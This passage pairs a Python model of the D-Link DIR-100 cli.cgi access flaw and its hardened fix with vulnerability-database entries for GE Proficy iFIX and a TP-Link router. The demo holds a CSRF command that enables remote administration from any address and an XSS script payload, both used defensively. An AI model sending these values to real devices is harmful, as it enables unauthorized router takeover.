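As an added illustration of the access check described in 3.2 and 3.4 and of the missing server-side validation in 3.5 (example code written for this page, not code from the DIR-100 firmware or from the advisory's author): a Python model of a cli.cgi-style authorization check that trusts the client IP address alone, beside a hardened version that binds the session to an unguessable cookie, requires a per-session CSRF token for commands that commit configuration, and validates the `dhcps set name=` value server-side before storing it. The class and function names, the request fields, the sample credentials and the client addresses are assumptions of the example; the real CGI's internals are not known.

```python
"""Added example for this page: a model of the DIR-100 cli.cgi access check
beside a hardened one. Not code from the firmware or from the advisory; the
class names, request fields and sample credentials are assumptions."""
import hmac
import html
import re
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

# Constructed sample credential store (the advisory's PoCs log in as admin/password).
ADMIN_CREDENTIALS = {"admin": "password"}


def is_state_changing(cmd: str) -> bool:
    """Commands in the advisory that write config end in ';commit' or start with 'dhcps set'."""
    return ";commit" in cmd or cmd.startswith("dhcps set")


@dataclass
class Request:
    client_ip: str
    params: Dict[str, str]                        # decoded query string, e.g. {"cmd": "help"}
    cookies: Dict[str, str] = field(default_factory=dict)


class VulnerableCli:
    """3.2: once an address has logged in, every request from that address is trusted."""

    def __init__(self) -> None:
        self.unlocked_ips: set = set()

    def login(self, ip: str, user: str, password: str) -> bool:
        ok = ADMIN_CREDENTIALS.get(user) == password
        if ok:
            self.unlocked_ips.add(ip)
        return ok

    def authorized(self, req: Request) -> bool:
        # No cookie, no token: a cookieless curl, or an <img> request forged into the
        # administrator's browser, comes from the same address and passes.
        return req.client_ip in self.unlocked_ips


class HardenedCli:
    """Session bound to an unguessable cookie; writes also need a per-session CSRF token."""

    def __init__(self) -> None:
        self.sessions: Dict[str, Dict[str, str]] = {}

    def login(self, ip: str, user: str, password: str) -> Optional[str]:
        # Plain comparison stands in for a password-hash check in this model.
        if not hmac.compare_digest(ADMIN_CREDENTIALS.get(user, ""), password):
            return None
        session = secrets.token_urlsafe(32)
        self.sessions[session] = {"ip": ip, "csrf": secrets.token_urlsafe(32)}
        return session

    def csrf_token(self, session: str) -> str:
        """The UI embeds this in its own links and forms; a third-party site cannot read it."""
        return self.sessions[session]["csrf"]

    def authorized(self, req: Request) -> bool:
        session = self.sessions.get(req.cookies.get("session", ""))
        if session is None or session["ip"] != req.client_ip:
            return False
        if not is_state_changing(req.params.get("cmd", "")):
            return True
        # A forged cross-site request carries the cookie automatically but not the token.
        return hmac.compare_digest(req.params.get("csrf", ""), session["csrf"])


# 3.5: the name for 'dhcps set name=' is validated only in the browser. Validate it
# server-side as a hostname label and escape on output so stored data cannot become markup.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def validate_dhcp_name(name: str) -> bool:
    return HOSTNAME_RE.fullmatch(name) is not None


def render_cell(value: str) -> str:
    return html.escape(value, quote=True)


def demo() -> Dict[str, bool]:
    """Replays the advisory's scenarios against both models and returns the verdicts."""
    admin_ip = "192.168.0.50"                     # constructed address of the admin's PC
    help_cmd = {"cmd": "help"}
    # The remote-administration command from the advisory's CSRF PoC, URL-decoded.
    remote_on = {"cmd": "$sys_remote_enable=1%;$sys_remote_ip=0.0.0.0%;$sys_remote_port=80%;commit"}
    xss_name = "<script>alert(1)</script>"
    out: Dict[str, bool] = {}

    v = VulnerableCli()
    v.login(admin_ip, "admin", "password")
    out["vuln_same_ip_no_cookie"] = v.authorized(Request(admin_ip, help_cmd))
    out["vuln_forged_commit"] = v.authorized(Request(admin_ip, remote_on))

    h = HardenedCli()
    sess = h.login(admin_ip, "admin", "password")
    if sess is None:
        raise RuntimeError("sample login failed")
    cookie = {"session": sess}
    out["hard_same_ip_no_cookie"] = h.authorized(Request(admin_ip, help_cmd))
    out["hard_read_with_cookie"] = h.authorized(Request(admin_ip, help_cmd, cookie))
    out["hard_forged_commit"] = h.authorized(Request(admin_ip, remote_on, cookie))
    out["hard_commit_with_token"] = h.authorized(
        Request(admin_ip, {**remote_on, "csrf": h.csrf_token(sess)}, cookie))
    out["hard_stolen_cookie_other_ip"] = h.authorized(Request("10.0.0.9", help_cmd, cookie))
    out["xss_name_rejected"] = not validate_dhcp_name(xss_name)
    out["xss_rendered_inert"] = "<" not in render_cell(xss_name)
    return out


if __name__ == "__main__":
    for check, verdict in demo().items():
        print(f"{check:28s} {verdict}")
```

The vulnerable model accepts both the cookieless `help` request from the administrator's address (the 3.2 scenario) and the forged `;commit` command (the 3.4 scenario). The hardened model rejects both, still accepts the browser's own requests once they carry the session cookie and, for writes, the token it was issued, and refuses a copied cookie presented from another address. The hostname check rejects the `<script>` payload from 3.5 outright, and escaping on output keeps any value that did get stored from being interpreted as markup.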
VAR-201312-0506 No CVE GE Proficy HMI/SCADA-iFIX 'TCPTASK.exe' Remote Buffer Overflow Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
GE Intelligent Platforms Proficy HMI/SCADA–iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 4.5, 5.0 and 5.1 have a remote buffer overflow vulnerability in the TCP/IP task process (TCPTASK.exe). Successful exploitation allows an attacker to execute arbitrary code in the context of the affected application
VAR-201312-0504 No CVE GE Proficy HMI/SCADA-iFIX Unsafe Default Password Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
GE Intelligent Platforms Proficy HMI/SCADA–iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 7.19i and 7.44a ship with an unsafe default password. A remote attacker who knows the default credentials set during the installation process can use them to gain unauthorized access to the system
VAR-201312-0502 No CVE GE Proficy HMI/SCADA-iFIX 'TCPTASK.exe' Remote Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
GE Intelligent Platforms Proficy HMI/SCADA–iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 5.0, 5.1 and 5.5 have a remote buffer overflow vulnerability in the TCP/IP task process (TCPTASK.exe). A remote attacker can trigger it by sending a specially crafted TCP/IP message, resulting in a denial of service
VAR-201312-0549 No CVE TP-Link TL-WR740N/TL-WR740ND Wireless N Router HTTP Processing Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The HTTP service of the TP-Link TL-WR740N/TL-WR740ND Wireless N router fails to properly handle user-submitted requests; a remote attacker can send a specially crafted request that crashes the server, causing a denial of service. TP-LINK TL-WR740N and TL-WR740ND are wireless router products of the Chinese company TP-LINK. The denial of service vulnerability exists in TP-LINK TL-WR740N / TL-WR740ND running firmware 3.12.11 Build 120320 Rel.51047n. An attacker could use this vulnerability to crash an affected device and cause a denial of service. TP-Link TL-WR740N/TL-WR740ND are prone to a denial-of-service vulnerability